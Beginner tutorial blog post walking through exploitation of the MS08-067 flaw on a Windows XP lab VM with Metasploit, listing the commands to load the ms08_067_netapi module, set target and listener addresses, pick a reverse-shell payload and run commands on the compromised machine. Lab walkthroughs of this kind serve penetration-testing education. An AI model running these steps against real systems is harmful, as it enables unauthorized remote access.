Metasploit Basics for Beginners – Exploiting Windows XP (MS08–067) with Metasploit (Kali Linux) – Part 1

Author
Updated: June 24th, 2021
5 mins read

We will be going through the basics of using Metasploit to exploit Windows XP machine using MS08–067 vulnerability in this article.

Setup Used for Practicing Metasploit Basics:

  1. Install the latest version of Virtualbox based on your host o/s from (https://www.virtualbox.org/wiki/Downloads)
  2. Download and install Kali Linux 2018.2 ISO as Virtualbox VM and set Networking to Bridged mode for this VM.
  3. Buy and Install a Fresh Windows XP SP2 ISO with no updates installed as Virtualbox VM and set Networking to Bridged mode for this VM.
  4. It is recommended to confirm if Windows XP VM we have installed is Missing ms08–067 Update — (https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067) and if you found this update installed, kindly uninstall this update.
  • We need Kali Linux 2018.2 as Kali comes with Metasploit Framework pre-installed.
  • We need Target Windows machine to explore the steps involved in using Metasploit to exploit MS08–067: Vulnerability in Server Service Could Allow Remote Code Execution (https://www.cvedetails.com/cve/CVE-2008-4250/)

Starting Metasploit Framework in Kali VM:

1) Start the PostgreSQL database with the following command in Kali Terminal

service postgresql start
Metasploit Basics for Beginners

2) Now we can start the Metasploit service with the following command in Kali Terminal

service metasploit start

3) Once metasploit service has started now we can start metasploit text based console with the following command in Kali Terminal

msfconsole
Metasploit Basics for Beginners

Basics of Metasploit Framework via exploitation of ms08–067 vulnerability in Windows XP VM:

1) Metasploit search command usage

We will use search command to search for if any module available in metasploit for vulnerability in focus which is ms08–067, hence enter the following command in kali terminal

search ms08–067
Metasploit Basics for Beginners

2) Metasploit Info command usage

Now in order to gather detailed information about available metasploit module for ms08–067 vulnerability, we will enter the following command in kali terminal

Info exploit/windows/smb/ms08_067_netapi

The key features to be noticed from info command results are mentioned below:

Platform, Rank, Privileged, Available Targets, Basic Options, Payload Information etc.

  • Platform :  Target Operating Systems in which this module will work like Windows or Linux or Android
  • Rank :  Always recommended to choose exploits with a better ranking like Excellent or Great.
  • Privileged :  Gives idea if this module will provide or need high privileges on the Target
  • Available Targets:  Lists all possible targets that can be exploited by this module
  • Basic Options:  Lists the options which can be set before using this module against the target. Allowing the user to customize various basic options based on attacker needs. It informs us of the mandatory options which need to be set for the module to run.
  • Payload Information :  Lists the information which helps us decide which are payloads that are compatible with a specific exploit because payloads help us in post exploitation once the target is in our control.

Related Blog – Astra’s Sample Penetration Testing Report

3) Metasploit use command usage

Once we confirm the specific metasploit module (exploit) to use, we can execute the command below to use the specific exploit available for ms08–067 vulnerability.

use windows/smb/ms08_067_netapi
Metasploit Basics for Beginners

4) Setting up the Module Options in Metasploit

Once you have chosen specific exploit, enter the following command to list all options available for this exploit module and also notice the column Required in image below, It is mandatory to fill the options where the value of Required is yes.

show options
Metasploit Basics for Beginners

5) Setting RHOST to Target Windows XP VM IP Address

IP Address of Windows XP VM (Found by entering ipconfig command in cmd of Windows XP VM).

In Kali Terminal enter the command below to set RHOST as Windows XP VM

Set RHOST 192.168.0.8
Metasploit Basics for Beginners

Now we can go ahead and change other options available such as RPORT and SMBPIPE to user defined values as per our need but for the sake of following through this article, we will leave all other options as default values set works fine for this exploit.

6) Using an Available Target for specific Metasploit Module

Now we can enter the command mentioned below to list all available targets for our (ms08_067_netapi) module

show targets
Metasploit Basics for Beginners

We can set specific target based on operating system our target is running by entering the command below:

set Target (Target Number)
Metasploit Basics for Beginners

But in this tutorial, we will leave the default option of Automatic Targeting.

Related Blog – Penetration Testing

7) Selecting and using any of Compatible Payloads for this Exploit module

Enter the following command in terminal to list all compatible payloads available for this exploit.

show payloads
Metasploit Basics for Beginners

Now we can set any of best payloads, let’s say windowsàshell_reverse_tcp by using the command below

set payload windows/shell_reverse_tcp

8) Setting up Payload Options before exploitation

show options
Metasploit Basics for Beginners

Enter the above command in terminal to view the options set for Payload and Module. We have already set the necessary options for module, now since our payload is a reverse shell, we need to set value for LHOST option to Kali Linux by using command mentioned below:

set LHOST 192.168.0.7

9) Exploiting the Target with Metasploit

Now enter the exploit command in terminal now to get a command shell on our Target.

Metasploit Basics for Beginners

10) Proof of Exploitation

Now we can execute some of windows commands to get information regarding the compromised machine using commands systeminfo and ipconfig as shown below:

Metasploit Basics for Beginners
Metasploit Basics for Beginners

Stay Tuned, we will explore Post Exploitation with Metasploit (Meterpreter Basics) in Part 2 of this article.